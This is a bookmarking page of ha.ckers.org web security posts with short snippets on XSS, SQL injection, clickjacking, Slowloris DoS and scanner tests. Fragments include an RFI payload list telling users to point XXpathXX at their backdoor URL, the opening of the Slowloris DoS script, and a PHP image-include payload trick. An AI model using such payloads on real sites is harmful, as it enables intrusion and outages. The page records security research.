『ha.ckers.org web application security lab』

  • Accuracy and Time Costs of Web Application Security Scanner Report ha.ckers.org web application security lab

    3 users

    ha.ckers.org

    Larry Suto is back with another report outlining the differences between some of the top web application scanners on the market. Before you get all uptight and start flaming me, I in NO WAY sponsored, encouraged or had anything to do with this test in any way. In fact, I only found out about it a few days ago. Not that I think that’ll stop the flame wars, but just direct your ire appropriately, pl

    • Society
    • 2010/02/04 11:29
    • memo
    • security
    • web
    • http://ha.ckers.org/weird/rfi-locations.dat

      3 users

      ha.ckers.org

      # Compiled by RSnake 01/29/2010 Mostly from milw0rm and other advisories. # Change XXpathXX to the path of your backdoor. Note that you may need to # try it against every directory on the target and because of how this was # culled you may need to add a question mark to your own XXpathXX URL: # Eg: XXpathXX => http://www.example.com/hax.txt? /2007/administrator/components/com_joomlaflashfun/admin.

      • Learning
      • 2010/01/30 22:30
      • http://ha.ckers.org/slowloris/slowloris.pl

        3 users

        ha.ckers.org

        #!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print \$shost, 'dns=s' => \$host, 'httpready' => \$httpready, 'num=i' => \$connections, 'cache' => \$cache, 'port=i' => \$port, 'https' => \$ssl, 'tcpto=i' => \$tcpto, 'test' => \$test, 'timeout=i' => \$timeout, 'version' => \$version, ); if ($

        • Life
        • 2009/06/24 16:46
        • security
        • Slowloris HTTP DoS

          46 users

          ha.ckers.org

          Slowloris HTTP DoS [ASCII-art banner omitted]

          • Life
          • 2009/06/19 20:40
          • apache
          • security
          • DoS
          • tool
          • http
          • slowloris
          • security
          • network
          • Hiding JS in Valid Images ha.ckers.org web application security lab

            4 users

            ha.ckers.org

            Matteo Carli wrote me today to discuss some RFI and JS stuff. We’ve been talking a lot about what uploaded images can do lately, but embedded JS is an interesting one for a few reasons. If you needed a drop for a payload, for instance. Here’s part of his email (edited slightly for formatting): So i created a simple php test like this: <?php include 'myimage.gif'; ?> and the result is like this. Im

            • Learning
            • 2009/04/14 17:00
            • *security
            • PHP
            • *javascript
            • security
            • JavaScript
            • Clickjacking Details ha.ckers.org web applicati...

              12 users

              ha.ckers.org

              Today is the day we can finally start talking about clickjacking. This is just meant to be a quick post that you can use as a reference sheet. It is not a thorough advisory of every site/vendor/plugin that is vulnerable - there are far too many to count. Jeremiah and I got the final word today that it was fine to start talking about this due to the click jacking PoC against Flash that was released

              • Society
              • 2008/10/08 11:17
              • clickjack
              • security
              • Clickjacking
              • todo
              • browser
              • flash
              • security
              • web
              • CSS History Hack

                7 users

                ha.ckers.org

                Originally found here but permanently hosted on ha.ckers.org with Jeremiah's permission. Ha.ckers.org home || Jeremiah's blog Firefox Only! (1.5 - 2.0) tested on WinXP.

                • Learning
                • 2008/07/01 20:13
                • javascript
                • css
                • security
                • Web Application Scanning Depth Statistics ha.ckers.org web application security lab

                  3 users

                  ha.ckers.org

                  One of the most difficult aspects of web application security scanners is understanding how to evaluate them. Obviously the false positive false negative ratios are important, but it’s often difficult to measure, as it depends on the web application in question. However, Larry Suto came up with a very interesting concept on how to do unbiased measurements of web application scanners. One of the mo

                  • Learning
                  • 2007/10/26 16:38
                  • ha.ckers.org web application security lab - Archive » XSS Book Preview

                    5 users

                    ha.ckers.org

                    Well, we are finally done with the XSS book (XSS Attacks - Cross Site Scripting Attacks Exploits and Defense). It’s off at the presses, and should be on the shelves in a few weeks’ time. We were authorized to throw up a sample chapter and the table of contents from the book for anyone who would like to read it. You can download a zipped up version of Chapter 5 and the table of contents. Since it w

                    • Society
                    • 2007/04/24 17:07
                    • Security
                    • security
                    • book
                    • SQL Injection Cheat sheet: Esp: for filter evasion - by RSnake

                      3 users

                      ha.ckers.org

                      SQL Injection Cheat sheet: Esp: for filter evasion - by RSnakeLoading... You must enable iframes to see this image. By RSnake Note from the author: If you don't know how SQL Injection works, this page probably won't help you. This page is for people who already understand the basics of SQL Injection attacks but want a deep understanding of the nuances regarding filter evasion. This page will also

                      • Learning
                      • 2007/02/26 12:07
                      • sql
                      • security
                      • Detecting FireFox Extentions ha.ckers.org web application security lab

                        3 users

                        ha.ckers.org

                        In the same vein as the IE specific res:// URLs that can help you detect Internet Explorer, I’ve taken that detection one step further in Firefox. After discovering the issue with IETab where a user can be maliciously forced into the Internet Explorer rendering engine it got me thinking about ways to even detect that that is possible. How do you know your target is running what, and how to do you

                        • Society
                        • 2006/09/05 19:24
                        • security
                        • mozilla
                        • extension
                        • firefox
                        • http://ha.ckers.org/weird/firefox-extentions.html

                          6 users

                          ha.ckers.org

                          Return to the homepage Note: This will not work if you don't have Firefox and JavaScript enabled. This works by asking the browser to render the chrome that has been registered by each browser extension. Once they load up properly it uses an onload event handler to write to a span tag. Using this you can detect what is installed on an extension by extension basis. You are not using Search Status

                          • Learning
                          • 2006/09/05 14:21
                          • firefox
                          • addon
                          • extension
                          • Cross-site scripting vulnerability in Google Personalized Homepage

                            7 users

                            ha.ckers.org

                            Google is vulnerable to cross site scripting. While surfing around the personalization section of Google I ran across the RSS feed addition tool which is vulnerable to XSS. The employees at Google were aware of XSS as they protected against it as an error condition, however if you input a valid URL (like my RSS feed) it will return with a JavaScript function containing the URL. If you append the

                            • Life
                            • 2006/07/06 09:30
                            • xss
                            • security
                            • google
                            • Ajax
                            • security
                            • JavaScript
                            • ha.ckers.org web application security lab

                              19 users

                              ha.ckers.org

                              I’m already back in the airport after a long day over at the world OWASP conference in New York. Among other things that were noteworthy was some extremely tacky marketing schwag from the ISC2 folks that says, “I fill the holes in your SLC”. I feel dirty having even typed that. I wish I were kidding. Ridiculous pictures of Dave Aitel wearing said schwag may or may not end up online in the near fut

                              • Learning
                              • 2006/07/05 19:00
                              • security
                              • *security
                              • Hack
                              • programming
                              • read later
                              • XSS (Cross Site Scripting) Cheat Sheet

                                624 users

                                ha.ckers.org

                                XSS (Cross Site Scripting) Cheat Sheet Esp: for filter evasion By RSnake Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to

                                • Life
                                • 2005/07/26 05:06
                                • xss
                                • security
                                • cheatsheet
                                • security
                                • javascript
                                • web
                                • cheat sheet
                                • programming
                                • cheat sheet
                                • hack
